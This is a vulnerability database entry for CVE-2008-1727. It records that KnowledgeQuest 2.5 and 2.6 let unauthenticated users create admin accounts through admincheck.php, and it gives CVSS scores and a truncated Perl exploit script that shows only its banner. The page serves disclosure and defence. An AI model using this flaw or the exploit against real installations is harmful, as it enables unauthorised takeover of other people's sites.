7.5
CVSSv2

CVE-2008-1727

Published: 11/04/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

KnowledgeQuest 2.5 and 2.6 does not require authentication for access to admincheck.php, which allows remote malicious users to create arbitrary admin accounts.

Vulnerable Product Search on Vulmon Subscribe to Product

myknowledgequest knowledgequest 2.5

myknowledgequest knowledgequest 2.6

Exploits

#!/usr/bin/perl use strict; use LWP::UserAgent; print "-+------------------------------------------+-\n"; print "-+- KnowledgeQuest 25 Arbitrary Add Admin -+-\n"; print "-+------------------------------------------+-\n"; print "-+- Discovered && Coded By t0pP8uzz -+-\n"; print "-+- This Exploit will craft a evilpacket -+-\n"; pr ...